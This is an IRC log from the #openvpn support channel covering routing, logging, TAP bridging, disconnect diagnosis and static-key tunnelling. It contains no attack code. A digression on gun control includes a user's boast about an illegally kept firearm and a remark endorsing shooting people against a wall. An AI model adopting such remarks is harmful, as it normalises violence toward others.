11:03 < kjs> i see 11:03 < kjs> so there is no historic log ? 11:03 <@ecrist> look at --log 11:04 <@ecrist> try reading the man page 11:05 <@ecrist> IT: routes aren't getting pushed properly yet, still looking 11:06 <@ecrist> !iroute 11:06 <@vpnHelper> "iroute" is does not bypass or alter the kernel's routing table, it allows openvpn to know it should handle the routing when the kernel points to it but the network is not one that openvpn knows about. This is only needed when connecting a LAN which is behind a client, and therefor belongs in a ccd entry. Also see !route and !ccd 11:06 < kjs> looks like someone has commented it out... 11:06 < kjs> # Log messages to the syslog. 11:06 < kjs> ;log openvpn.log 11:06 < kjs> ;log-append logs/openvpn.log 11:06 <+EugeneKay> !paste 11:06 <@vpnHelper> "paste" is "pastebin" is (#1) please paste anything with more than 5 lines into pastebin or a similar website, or (#2) ie: www.pastebin.ca 11:06 < kjs> It was 3 lines... 11:06 <@ecrist> kjs: that someone would be you, or another admin 11:06 < kjs> Not me. 11:07 <@ecrist> so, another admin 11:07 <@ecrist> or gremlins maybe 11:07 <@ecrist> or the nazis 11:08 < kjs> Ex admin ;) 11:09 <@ecrist> IT: you need to add "route 192.168.0.0 255.255.255.0" to your server config 11:10 < kjs> What a bitch, I can't think of another way of finding out if a user has been connecting to the VPN or not.. 11:10 <@ecrist> you have to log the traffic... 
11:22 -!- raidz_away is now known as raidz 11:22 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 11:25 -!- ronsel [~ronsel@dslb-088-074-167-187.pools.arcor-ip.net] has quit [Quit: Dieser Computer ist eingeschlafen] 11:28 -!- mode/#openvpn [-o plaisthos] by ChanServ 11:28 * plaisthos hides again 11:32 -!- ade_b [~Ade@kista.guest.accome.com] has joined #openvpn 11:32 -!- ade_b [~Ade@kista.guest.accome.com] has quit [Changing host] 11:32 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 11:35 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit [Ping timeout: 276 seconds] 11:41 -!- chrisb [~chrisb@li482-205.members.linode.com] has quit [Ping timeout: 264 seconds] 11:52 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 11:56 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has quit [Ping timeout: 246 seconds] 11:57 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn 12:00 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has joined #openvpn 12:03 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 12:15 -!- chrisb [~chrisb@li482-205.members.linode.com] has quit [Ping timeout: 246 seconds] 12:24 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn 12:25 -!- `Ile` [~kvirc@212-200-214-138.dynamic.isp.telekom.rs] has quit [Quit: KVIrc 4.1.3 Equilibrium http://www.kvirc.net/] 12:52 -!- staticsafe [~staticsaf@unaffiliated/staticsafe] has joined #openvpn 12:55 -!- pa [~pa@unaffiliated/pa] has quit [Read error: Connection reset by peer] 12:58 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 13:01 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 13:08 * EugeneKay sneezes violently 13:08 * ecrist doesn't give a shit 13:08 <+EugeneKay> I need to do that too, now that you mention it. 13:10 <@ecrist> at the office, we refer to it as doing 'paperwork' 13:10 <+EugeneKay> Ah, offices. How quaint. 
13:11 <@ecrist> indeed
13:38 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn
13:44 -!- n2deep_ [n2deep@odin.sdf-eu.org] has joined #openvpn
13:48 -!- n2deep_ [n2deep@odin.sdf-eu.org] has quit [Client Quit]
13:48 -!- n2deep [n2deep@odin.sdf-eu.org] has quit [Quit: Lost terminal]
13:49 -!- n2deep [n2deep@odin.sdf-eu.org] has joined #openvpn
14:23 -!- novaflash [~novaflash@openvpn/user/novaflash] has quit [Changing host]
14:23 -!- novaflash [~novaflash@openvpn/corp/support/novaflash] has joined #openvpn
14:23 -!- ServerMode/#openvpn [+v novaflash] by sturgeon.freenode.net
14:23 -!- mode/#openvpn [+o novaflash] by ChanServ
14:31 <+pekster> kjs: I wrote a generic (and of course extensible) on-disconnect accounting script if you want to use it. It's GPLv3 code, so you're free to use it as a starting point for anything else you might need
14:31 <+pekster> !accounting
14:31 <@vpnHelper> "accounting" is http://pekster.sdf.org/code/files/openvpn-user-accounting.tgz for some bash code for basic accounting
14:31 <@ecrist> gah, GPL
14:32 <+pekster> ecrist: Could be worse: I could have used GNU AGPL for that ;)
14:32 <@ecrist> heh
14:32 * ecrist refines regex
14:33 <@ecrist> gah, /[\w]{,1}GPL/
14:33 <+pekster> I wrote some regex yesterday to remove comments and zero chain counters on iptables-save rules
14:33 <+pekster> sed -r -e '1,1 p' -e '/^#/ d' -e 's/\[[[:digit:]]+:[[:digit:]]+\]/\[0:0\]/'
14:33 <@ecrist> I really hate that particular syntax
14:33 <@ecrist> PCRE FTW
14:34 <+pekster> No perl on my target system ;)
14:34 <@ecrist> the world's not perfect
14:34 <@ecrist> you don't need Perl for PCRE
14:34 <+pekster> How about an ash shell? ;)
14:34 <@ecrist> even grep supports it
14:40 -!- KaiForce [~chatzilla@adsl-70-228-65-227.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.89 [Firefox 17.0.1/20121128204232]]
14:49 -!- chrisb [~chrisb@li482-205.members.linode.com] has quit [Ping timeout: 276 seconds]
14:51 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn
14:52 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has joined #openvpn
15:08 -!- brute11k [~brute11k@89.249.235.33] has quit [Quit: Leaving.]
15:13 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt]
15:16 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn
15:28 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
15:37 -!- nutron [~nutron@unaffiliated/nutron] has joined #openvpn
15:58 < plaisthos> ecrist: gnu grep but other greps?
16:01 <+pekster> I suppose [0-9]+ is shorter. I dunno, just preference/taste really
16:05 < plaisthos> but probably not the same
16:05 < plaisthos> when localisation and unicode is used
16:09 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has quit []
16:13 <+pekster> Well, "digit" is pretty common in most encodings :P
16:15 < plaisthos> pekster: there might be additional numbers like japanese numbers
16:15 <+pekster> Ah, I suppose
16:28 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn
16:28 -!- mode/#openvpn [+v s7r] by ChanServ
16:36 -!- widith [~kenneth@li557-200.members.linode.com] has joined #openvpn
16:37 < widith> is it possible to pass 2 configuration files? I have one with all the parameters and the other with keys
16:37 <+s7r> congratulations for the release folks!
16:38 <+s7r> speaking of.. i have a question which stays on my mind. how come openvpn can connect via http proxy? how can you connect to an ftp website on port 21 via an http proxy? wasn't http proxy just for http traffic? what is happening
16:38 <+s7r> what is the difference between http proxy and socks4/5 proxy? as I recall socks was for all protocols while http proxy was just for browsing http websites and nothing more
16:39 <+s7r> so ?
16:40 <+s7r> widith: why don't you make a single file .. and that is all. include the certs there like
16:40 <+s7r> etc.
16:40 <+s7r> it is simpler this way
16:40 -!- dazo is now known as dazo_afk
16:43 <+pekster> widith: You can chain 'config' statements together
16:43 <+pekster> I don't see the advantage, but it's available to you as a feature if you want it
16:50 -!- defswork [~andy@141.0.50.105] has quit [Ping timeout: 265 seconds]
16:57 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has joined #openvpn
17:01 -!- defswork [~andy@141.0.50.105] has joined #openvpn
17:03 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 255 seconds]
17:03 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 252 seconds]
17:05 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
17:07 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving]
17:15 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Read error: Connection reset by peer]
17:15 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn
17:18 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has quit [Quit: Ex-Chat]
17:23 -!- chrisb [~chrisb@li482-205.members.linode.com] has quit [Ping timeout: 240 seconds]
17:23 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Ping timeout: 265 seconds]
17:27 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn []
17:36 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has joined #openvpn
17:36 -!- moore1 [~moore@50.7.199.107] has joined #openvpn
17:58 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Quit: Leaving]
18:10 -!- chrisb [~chrisb@pool-71-175-253-228.phlapa.east.verizon.net] has joined #openvpn
18:14 -!- chrisb [~chrisb@pool-71-175-253-228.phlapa.east.verizon.net] has quit [Ping timeout: 240 seconds]
18:16 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep]
18:17 -!- cyberspace- [20253@ninthfloor.org] has quit [Remote host closed the connection]
18:18 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn
18:32 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection]
18:46 -!- ancient3 [~Rockminto@c83-253-113-227.bredband.comhem.se] has joined #openvpn
18:47 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has joined #openvpn
18:48 < kantlivelong> hey all.. im using an openvpn TAP server with a remote windows client. for some reason LAN based games do not auto detect sessions. im assuming its using broadcast and am unsure why thats not being replayed?
18:48 -!- troy- [~troy@dcamp-bbr1.prg1.eu.tauri.ca] has quit [Quit: leaving]
18:48 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn
18:49 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn
18:49 < ancient3> kantlivelong: Bridge mode or ?
18:50 < ancient3> kantlivelong: Allow traffic for Tap interfaces.
18:51 < ancient3> kantlivelong: And bridge interfaces to test it, so that nothing is blocked.
18:51 < kantlivelong> ancient3: its bridged
18:51 < kantlivelong> and traffic is flowing
18:51 < kantlivelong> i can ping/make connections manually
18:52 -!- moore1 [~moore@50.7.199.107] has quit []
18:54 < ancient3> The windows client needs a port that it cannot rech from the servers TAP/Bridge interfaces. Firewall ?
18:55 < ancient3> Reach
18:56 < ancient3> Once a vpn-client connects you need to think of the interfaces as local interfaces for the client.
18:56 < kantlivelong> yeah
18:58 < ancient3> If you can... open up both the client and server firewalls. Test the game to exclude any of those issues.
19:00 <+pekster> kantlivelong: Using wireshark to capture packets may help. IIRC, IPX routing in Windows is highly broken, and I recall from a few years back failing to get some game auto-detect working because Windows was routing the reply IPX packet out of the physical LAN instead of the VPN where the source IPX broadcast came from :(
19:00 < kantlivelong> ancient3: the game works as expected when specifying the IP of the other node
19:00 <+pekster> So, if you're using IPX, you might just be screwed. I looked up relevant MS docs on IPX routing, and they were wrong (not a huge surprise, but frustrating at least)
19:00 < kantlivelong> its when searching for games on a lan
19:00 < kantlivelong> so might be ipx..
19:00 < kantlivelong> hmm
19:01 <+pekster> Well, if it's using IPX (most newer games don't and prefer to use a UDP/TCP broadcast)
19:01 <+pekster> That could be a firewall issue, depending on how your LAN systems and routers are configured
19:01 < kantlivelong> well one easy game i tested was minecraft
19:01 < kantlivelong> i see UDP packets on my lan on broadcast
19:01 < kantlivelong> but not on the end client
19:02 <+pekster> A bridged/tap setup will send that across the VPN, so I suspect your firewall is getting in the way
19:02 <+pekster> Follow packets and tcpdump/wireshark at each step
19:02 < kantlivelong> pekster: do i need to add a specific route for broadcast?
19:02 < kantlivelong> firewall is wide open on the tap/bridge
19:02 < ancient3> kantlivelong, pekster: Oooh! IPX, Today! :) Haha, that's funny :)
19:02 < ancient3> IPX/SPX
19:03 <+pekster> Some of us still like playing games from the 90's :(
19:04 <+pekster> Now please excuse me while I turn on my Electric Sheep screensaver ;)
19:04 < kantlivelong> haha
19:04 < ancient3> Well, you live and learn. But odd, because i thought minecraft used TCP/IP
19:04 < kantlivelong> i hate games that require searching instead of just letting me slap in the ip
19:05 < kantlivelong> ancient3: it does im sure for the connection. but not for broadcasting games
19:05 < kantlivelong> though most games use udp
19:05 < kantlivelong> hmm
19:06 < ancient3> kantlivelong: Aha! ... So many games do that (or did)... It's odd why they don't use a central DB to announce connectable games.
19:06 < kantlivelong> ancient3: why would they? most people dont have time to setup servers
19:06 < ancient3> Yeah, but not IPX, that's just evil :)
19:07 -!- Guest15284 [~LaStik@62.109.16.198] has quit [Ping timeout: 240 seconds]
19:07 < ancient3> Yeah, let's use a protocol that no one wants, right ? :)
19:08 <+pekster> IPX would be (have been?) easier to use if Redmond's own documentation was actually correct :(
19:09 < ancient3> I think that's Novell's protocol.
19:09 < ancient3> Or was.
19:09 <+pekster> Well, when a Windows game uses it, you're stuck using Redmond's frontends to interact with the OS
19:10 < ancient3> Yep, complete crap is mostly what they provide. As little interaction between operating systems as possible is "Encouraged".
19:11 <+pekster> Unix/Linux seem to mostly "get along" despite their fundamental differences ;)
19:11 < ancient3> I like the EU that way. They said "Make operating systems talk to each other". This has worked very well if you look at samba for instance.
19:14 < ancient3> Naah, UNIX/Linux/BSD/Apple is ok. Only Windows doesn't want interoperability.
19:18 < ancient3> Apple maintains cups, Oracle maintains MySQL and openoffice nowadays. I think they are doing a good job without knowing a whole lot of the intricacies. They provide usable and nice code i think. But i wonder why openoffice (the old staroffice from Germany) is so hard to compile. They need to work on that.
19:19 <+EugeneKay> Oracle dropped OpenOffice; it's a stalled Apache project now 19:19 <+EugeneKay> All of the core developers left and formed The Document Foundation, which produces LibreOffice 19:19 < ancient3> EugeneKay: Aha!, yeah i saw that and im using Libre office nowdays :) 19:20 <+EugeneKay> The same thing is happening with MySQL --> MariaDB. Percona is a notable fork, but it's for-profit. 19:28 < ancient3> Yes, they are generally forked to provide extra functions to paying customers. I have thought about that too, To make a standard thing and then allowing payments for it so customers will for instance get database support within the GUI's that im making. But im more interrested in working for a company or so that i use my code for my CV and let it loose across the worlds :) 19:30 < ancient3> I assume Percona is maintained by Spanish people... This will probably be a much better version because they seem to be highly unemployed at the moment. 19:33 < ancient3> Im in Sweden and i have been unemployed for 4 years in a few months. People who shouldnt have jobs in IT have them. Thats very odd, because i thought that skills had anything todo with working. 19:33 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 19:34 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Ping timeout: 265 seconds] 19:35 < ancient3> It was the same shit in 1998-2002 ... Seems idits get to work that needs to realize they hate their jobs and do not work in IT anymore. Or so they try to tell people. 
19:35 <+pekster> There are still companies out there that value actual skill 19:36 <+pekster> The better ones even respect the public/private IP issues too 19:36 < ancient3> pekster: I sure hope so :) 19:36 <+pekster> ancient3: You might enjoy a talk at 29C3 (torrents and mirrors available) called 'Securing the Campaign' where the head of security for the Obama 2012 campaign talks about IT security 19:38 < Suterusu> Anyone bored enough to help diagnose why I keep gitten D/c'd form my VPN? 19:40 < ancient3> pekster: I actually think Obama is doing much good. Especially if he removes guns from the streets as he has done. Because with all the shootings over there i feel the NRA needs to realize what the hell they are doing to their own people. 19:41 < Suterusu> They allowed to carry guns for a reason 19:41 < Suterusu> protection 19:42 -!- LaStik [~LaStik@62.109.16.198] has joined #openvpn 19:42 < Suterusu> Not from each other, the muggers an burglars etc - Thats a bonus - Its protection from tyrannical rule 19:42 <+pekster> A lot of the problem is social too; Canada has more guns per person and far less deaths. Plus we seem to care more as a country about our 2nd admendemnt (right to guns) than our 4th (right to privacy and protection from unwarrented searches) 19:42 -!- LaStik is now known as Guest55454 19:42 <+pekster> Suterusu: Don't ask to ask, just ask. We're talking about other stuff because no one has asked about VPNs in a while ;) 19:42 < Suterusu> If needed, the country could rise at arms to enforce a new leader 19:42 <+pekster> True, but I don't think we're in danger of being invaded by England. Not for a while anyway :P 19:43 < Suterusu> Who 'asked to ask'? I said my piece - Peeps interested or they int 19:43 < Suterusu> lol, more likey china 19:43 < Suterusu> Esp once they figgure owt you aint got they gold 19:44 < ancient3> Suterusu: Yes, its an evil and downwards pointing spiral that will lead to more guns. 
But what if there where stricter checks on whom could get and or carry a gun. Now i know you dont want Psychopaths to have guns for example (I wouldnt). 19:45 < Suterusu> Police can carry 'em, I want better - They've proved to me (generally) they can't be trusted.... 19:46 < Suterusu> 'tis 'Gun-free' here in England - But that didn't stop me gettin several as a teen - Every other farmer got at least one shotgun, too 19:47 < Suterusu> Accord to FBI, Over in states, More people die from clubs, bats and hammers than rifles, per yr, Consistently - 'tis hardly an award winning argument "less guns = less gun crime" 19:51 -!- raidz is now known as raidz_away 19:54 < ancient3> Suterusu: But i bet more people can be killed with automatic fire. Especially children for instance ? 19:56 < ancient3> Suterusu: Or do you defend children getting killed at schools so much that you want no change in gunlaws at all ? 19:56 < Suterusu> true - as prev. saids, tho - I phear more to gain not from taking away the assault rifle, but to acrue a state of mind where it isn't considered as an option 19:56 <+pekster> Again, depends on social situation. Guns are a big issue in Mexico now too despite them being effectively illegal for citizens. I'm not saying it's right, but social/pollitical issues are complicated :( 19:57 <+EugeneKay> 19:58 <+pekster> Hey, I made an offer to help with a VPN problem. On the downside, I'm leaving for the gym in a few minutes, so that offer will be scaling some walls for a couple hours :P 20:00 < ancient3> I say that a nationwide, per person reapply, for the use of a firearm is required 20:01 < Suterusu> Teh rules will just narrow and narrow until only 'the authorities' are 'allowed' - Like here - A long and slippery slope, the further down you go the more speed you gain, and the harder it will be to climb up 20:01 < ancient3> And they cant atleast be psycho's to get thair gun permits back. 20:01 <+pekster> Play nice, or take it to ##politics. 
The only climbing I'm doing is at the gym ;) 20:02 < Suterusu> The true psycho's will get 'em anyhay, by illegal means - Or, Just maybe, Build some, Or something better....... 20:03 < Suterusu> When you can punt a LR36 battery onto the horzion, You might as well be walking around with an AA Cannon 20:06 < Suterusu> Besides, The psychopaths aint from what y'should worry.... They typically somewhat lazy. Don't give 'em the reason to expend the energy - They'll do nothing without a reason (you might no be able to see it, or its logic, But there is awlways a reason) 20:06 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 20:09 < ancient3> Suterusu: Yes, and i would say that the reason for them to have a reason (mostly) is there because they feel there is a reason in the first place. Such as people having guns, thair psycho friends having guns and so on. 20:10 < ancient3> There are always means for reversing the displacement of guns. 20:11 < ancient3> I mean, wouldnt it be nice to know that about 90% of all guns in the US where owned by people who are mostly sane ? 20:11 < Suterusu> define sane 20:11 < ancient3> Not clinicly ill. 20:11 < Suterusu> I'm officially defined as insane - But I can wager I'll make more sense than most 20:13 < ancient3> But you are afraid without your gun i take it ? ... How many times have you protected yourself from getting killed with it ? 20:13 < Suterusu> Even the 'most sane' people can be placed in state of mind where (mass )execution seems not only logical, but right..... Wouldn't it be better to remove the contributing factors to that state of mind? 20:14 < dioz> dumb arguement 20:14 < ancient3> By allowing no control over who gets guns ? No, absolutely not. 20:15 < Suterusu> Anti-Gun law over here.... I do still keep one, but burried some way off - I've got better things closer t'hand, anyway - The one time I woulda 'needed' it, it woulda just made a mess. There's cleaner ways. Just needa be prepared. 
20:16 < ancient3> Suterusu: From what im getting you seem to almost believe in some sort of armageddon style stuff ? 20:17 < ancient3> Suterusu: Not that you have an Ioncannon in your front lawn or anything.. :) 20:18 < Suterusu> I don't discount it - BUt I see the 'holes' in 'society' - I can see the direction things taking - it aint gonna be good. Give it ten yrs, and we'll be in 1984 at this rate. 20:19 <+pekster> Hey, improvement in 2.3.0: tap-windows.exe is placed in the installation path. Progress! 20:21 < ancient3> Suterusu: Thats hard to argue with, but it wont kill you. It will only mean unemployment for a while. 20:22 < Suterusu> no, it'll be worse than death - a life of opression 20:23 < Suterusu> It starts, with deweaponising 'em, 'cause w/o most will be unable to think o a way of fighting back 20:24 < Suterusu> For decades, now, There's bin steady increase in training o military for 'urban combat' - And the rumours n reports of deploying military in your streets getting more frequent 20:24 < Suterusu> Won't be long after its happened over there, It'll want to happen over here. 20:26 < ancient3> Suterusu: Lets take this example: All weapons are illegal to have or bear by citizens. They have all been melted down. Explain why this would be bad for you ? 20:26 < Suterusu> It wouldn't - I have the ability to fabricate 20:26 < Suterusu> lol 20:26 < ancient3> So do i, and many others. Yep, saw that comin' 20:27 < Suterusu> There isn't much I can't turn into a weapon, tbh.... 20:27 < ancient3> But for you personally i mean. Are you just scared or do you have enemies that blahblah end so forth ? 20:28 < ancient3> We dont feel that way in our country. 20:28 < ancient3> Have no enemies, have no fear. 20:29 < Suterusu> I'm not 'scared' - But its better to has it and not need it, than need it and not has it - That said, me being me, I piss orf a lotta people - Some enough to try and kill me - no-one seems to be able to manage it. 
About the only chance they got is a high powered rifle n a lotta distance. And then they better hope it kills me, and either way, want to be running 20:30 <+EugeneKay> Seriously 20:30 <+EugeneKay> There's ##politics or ##guncontrol for this 20:31 < ancient3> Yes EugeneKay, but this is very interresting and noone else will be chatting for atleast one more hour i think. 20:31 -!- mode/#openvpn [+o EugeneKay] by ChanServ 20:31 <@EugeneKay> I don't care. 20:32 < Suterusu> I agree - Seriously, -=- Put 'em up against the wall n shoot 'em. Make the next lot watch. Tell 'em: We're watching. Don't screw up. 20:34 < ancient3> EugeneKay: Agreed. 20:38 < ancient3> So, are there any graphical user interfaces for this openvpn thing ? 20:39 -!- widith [~kenneth@li557-200.members.linode.com] has left #openvpn ["WeeChat 0.3.9.2"] 20:39 <@EugeneKay> Many. 20:39 <@EugeneKay> What OS? 20:39 < ancient3> Linux 20:40 <@EugeneKay> Typically the init scripts are used. NetworkManager has a thing, but.... 20:40 <@EugeneKay> !ubuntu 20:40 <@vpnHelper> "ubuntu" is dont use network manager! 20:40 <@EugeneKay> It sucks. 20:41 < ancient3> Ive heard that too. 
20:41 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has joined #openvpn 20:42 < Suterusu> Seems t'do it for me - Think using same NetworkManager is used in 'buntu - not 100% on that 20:42 < Suterusu> Can't make it auto reconnect, mind 20:42 <+pekster> Why not just write a couple of bash frontends and put a GUI link in your menu or taskbar of choice 20:43 < ancient3> Im using this one: http://dalalven.dtdns.net/linux/gadmin-openvpn/client/gadmin-openvpn-client-0.1.8.tar.gz 20:43 < Suterusu> I'd rather has it connected, constantly - Its not something I'd want to turn orf 20:43 < ancient3> its for gtk+ 20:43 < Suterusu> Ergo, something that should not need turning on 20:45 < Suterusu> Yur, I've played with gadmin suite - I seems to has more options in the network manager what shipped with mint (based on 'buntu) and just as many with this networkmanager (seems t'be gnomes, I'm in KDE) 20:46 < Suterusu> Tho, generally, the gadmin suite is aiight 20:46 < ancient3> Cool, yeah its working for me. 20:47 < Suterusu> As I says, The netwrok manager workin for me... Hasn't given me no problems 20:47 < Suterusu> But spelt better 20:47 < ancient3> Haha, yeah :) 20:49 < ancient3> The netti wrokkie thingy :) 20:50 < Suterusu> Just wish I knew why keep losing connection from me VPN 20:50 -!- sauce [sauce@unaffiliated/sauce] has joined #openvpn 20:51 < ancient3> Suterusu: Generally a firewall issue. Havnt seen it otherwise. 20:52 < Suterusu> Why'd it be intermittent, tho 20:54 < Suterusu> Can't see nutting in logs for clues, Mosto time I'm r/c before other end knows I'm d/c 20:54 < ancient3> Depends on timeouts of relative inactivity. 20:55 <+pekster> See the description of --keepalive in the manpage (server's timeout is longer than the client's) 20:55 < Suterusu> Shldn't be 'timeouts' or 'relative inactivity' - Was fine the other day.... 20:56 <+pekster> Usually it boils down to a generic firewall problem, stateful firewall timeouts, or an agressive DPI firewall. 
Or prehaps just a connection with some loss on it 20:56 < Suterusu> Seems to suggest isn't settings - More an external influence 20:56 <+pekster> Sure, could be that too. An attacker sometimes tries to induce reconnections if it's a benefit to learn about your traffic, connection, or to perform an active attack such as TLS downgrade or similar 20:57 <+pekster> What's the log say? Discsonnect due to ping inactivity timeout? 20:57 < Suterusu> Question is - how - and more importantly - How does one ocunter 20:57 < Suterusu> Or counter 20:57 <+pekster> Counter what? I gave you a half-dozen options for the cause, and the resolution is different (or impossible) depending on the problem 21:02 < Suterusu> Well, 1'st lets assume an attacker is 'inducing reconnections' 21:03 < Suterusu> How would this be indentified, and or countered 21:05 <+pekster> Use a different ISP, or perhaps wrap your TLS connection inside an openvpn static tunnel so there's no defining protocol handshake. Possibly changing ports if youre using the default (or just changing it even if you're not to something else random) 21:06 -!- Carbon_Monoxide [~cmonxide@116.92.14.130] has joined #openvpn 21:07 < Suterusu> " wrap your TLS connection inside an openvpn static tunnel" Mind elabourating? 21:08 <+rob0> see the static key howto for OpenVPN 1.x 21:08 <+rob0> it is much simpler than client/server setups 21:09 <+pekster> Set up a static-key based tunnel, then connect your TLS session to the endpoint of that tunnel. You get the benefits of X509 key rotation and DH key exchange (for perfect forward secrecy) without the protocol-identifying traffic in the encapsulating UDP traffic to your peer across the wire 21:10 < ngharo> doing that all-in-one would make for an interesting port of openvpn 21:10 < fu_fu> heh 21:10 <+pekster> I've throught about designing a config generator that would do that 21:11 < fu_fu> hi everyone 21:11 <+pekster> It's tough because most setups have requirements beyond that anyway. 
Maybe as a 'use this then modify to suit' program, but if you're able to do that you can probably just follow the guides and replace the remote IP with the outer-connection's IP anyway 21:11 < ngharo> right 21:12 < ngharo> i just have a feeling people will be confused on which daemon to do routing on etc 21:12 < Suterusu> I'm already, AFAIK, in a 'static key tunnel', n I'm going over TCP, I think... 21:14 <+pekster> !forwardsecrecy 21:15 <+pekster> !static-key 21:15 <@vpnHelper> "static-key" is when you use --secret, you are using a static key. this is only valid for point-to-point setups. Static keys are less secure in that they never change. If someone captures your traffic, and then gains your static key a year from now, they can decrypt the captured traffic. Setups that use certs re-key every hour by default 21:15 <+rob0> If the static key tunnel is only transporting a TLS tunnel, potential loss of forward secrecy is No Big Deal. 21:15 < Suterusu> Also, not sure, but think I'm in 2.x 21:15 <+pekster> Right, I linked that as a hint to figure out how it's configured right now 21:15 <+pekster> Suterusu: PtP ("--secret" or static key mode) is still supported 21:16 <+rob0> Static key tunnels still work. 2.x is backward compatible. 21:16 < Suterusu> n naw, my keys rotate roughly every hr, cld be ½ hr - So don't think thats what I'm playing wtih currently 21:16 -!- jgspratt1 [~jgspratt@66.162.71.166] has joined #openvpn 21:17 <+pekster> You asked how you could theoretically combat active connection tampering. I offered you a solution based on a foundation that DPI was being used against you 21:17 <+pekster> I know that's not what you're using; I'm offering you high-level solutions based on a guess as to your problem ;) 21:17 <+pekster> We're a few layers down the rabit hole :P 21:18 < Suterusu> I'll fetch the JCB.... 
21:18 < jgspratt1> I'm pushing these routes to my client, but the client can only get to 10.25.1.101, which is the LAN IP of the OpenVPN server on the server side: http://hastebin.com/tewofigica.rb
21:18 < fu_fu> JCB?
21:18 < jgspratt1> I can ping/ssh to 10.25.1.101, where the server is listening. I can't get to 10.25.1.102, which is an identical server on the server-side LAN.
21:19 < jgspratt1> Routes on the client side show this: http://hastebin.com/ruqafecuni.php
21:19 < Suterusu> Big yellow digger
21:20 < fu_fu> has anyone installed additional TAPs on Win2008_r2(AWS); i have tried devcon and tapinstall (with addtap.bat) and it wont work
21:20 < jgspratt1> The "10.24.0.0 10.24.9.5 255.248.0.0" line is sending stuff to the tunnel on the client all right, but it isn't making it to the lan on the server side.
21:20 < Suterusu> Glancing over that static key how-to - I understand how to implement that, But Don't see how to embed my 'existing' connection inside. prolly me being thick - What am I missin?
21:21 <+rob0> jgspratt1, routes must be bidirectional. Does 10.25.1.102 know to reach the VPN clients through 10.25.1.101?
21:21 < jgspratt1> That's like, that's a good point.
21:22 <+rob0> Suterusu, first bring up the static key tunnel. Then direct your TLS tunnel through the VPN (using --remote on the client side.)
21:22 <+rob0> --remote static.key.VPN.IP
21:23 <+pekster> jgspratt1, there's a handy flowchart for connecting VPN clients to a server-side LAN like that:
21:23 <+pekster> !serverlan
21:23 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png
21:23 < jgspratt1> rob0: how can I fix this? I have lots of hosts on my server side that I don't want to reconfigure. could I take the gateway server and point 10.0.0.0/24 back to 10.25.9.2 ? Server routes: http://hastebin.com/jefunuheca.vala
21:23 <+pekster> fu_fu: Use the 'tap-windows.exe' installer you get after a 2.3.0 installation
21:24 < Suterusu> And where'd I type that?? So, Implement then use the static key'd tunnel, Then attach to the VPN again? Meaning two sets o config?
21:24 <+pekster> fu_fu: That utility used to be in the 'openvpn\bin\' path of your install, but that's no longer the case as of 2.3.x (including the _rc releases.) Just install the tap-windows.exe installer over the existing install and be sure to install the 'TAP Utilities' (not checked by default) during install
21:24 < fu_fu> i will try that, i have not seen it. do i have to unpack the exe installer for OVPN?
21:25 <+pekster> fu_fu: You can do that too if you'd like; use 7-zip and look in the .\$TEMP\ path of the primary installer
21:25 < fu_fu> nice, that could solve my issue nicely, thanks
21:25 < ngharo> Suterusu: yes
